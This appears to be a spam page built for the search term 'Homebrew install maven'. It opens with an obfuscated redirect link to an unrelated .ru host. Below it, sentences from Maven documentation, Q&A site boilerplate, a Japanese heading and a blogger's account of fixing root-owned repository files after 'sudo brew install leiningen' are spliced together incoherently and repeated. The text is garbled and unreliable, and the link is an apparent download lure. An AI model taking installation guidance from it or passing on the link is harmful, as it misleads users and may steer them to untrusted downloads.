Homebrew install maven => http://hatchmehrkowscon.nnmcloud.ru/d?s=YToyOntzOjc6InJlZmVyZXIiO3M6MjE6Imh0dHA6Ly9iaXRiaW4uaXQyX2RsLyI7czozOiJrZXkiO3M6MjI6IkhvbWVicmV3IGluc3RhbGwgbWF2ZW4iO30= You'll see the test components from your Maven Releases build. It assist in complex dependancy management including automatic updating of artefacts from central repositories into your local repository. Not the answer you're looking for? Snapshot components change over time and are generated during active development of a software project. It assist in complex dependancy management including automatic updating of artefacts from central repositories into your local repository. In case you do not have them, conduct the following steps. You can do this in the option on the menu bar. If you cannot escape the proxy, you need to tell Maven where your proxy is located. Check out the next section to continue installing prerequisites. Once you have installed Homebrew, make sure to restart the terminal session. So I needed to install maven again as it doesn't come built in. Maven relies on the Central Repository — a public repository for Java components. Homebrew で maven と gradle をインストール - Maven assist in simple project setup following best practices. Which I could ignore until I started using maven and leiningen which uses maven. Because maven is itself a package manager, so the user id with which you brew installed it may prevent you using it later. homebrew install maven This might not have mattered but then I also sudo brew install leiningen Which installed something or other into my maven repository. Diagnosis: Unable to resolve artifact: Missing: ---------- 1 org. I assume Apple set it that way but then again maybe macPorts homebrew install maven it a decade ago. I examine the exact path in the error message and then find that my earlier sudo brew install leiningen has resulted in the org. Bits of my repository - the clojure dir - is owned by root and I don't have write permissions. This time I'm happy to chown because the repository is in my home directory anyway. Because of course I just wanted to install maven and get on with using it. Now I try lein again: lein test Woohoo. Back to IntelliJ and press the lein go button: that works too. Now I can run and test clojure. Now I try to follow the palletOps quickstart instructions and I get error messages again. And, homebrew had installed lein 1.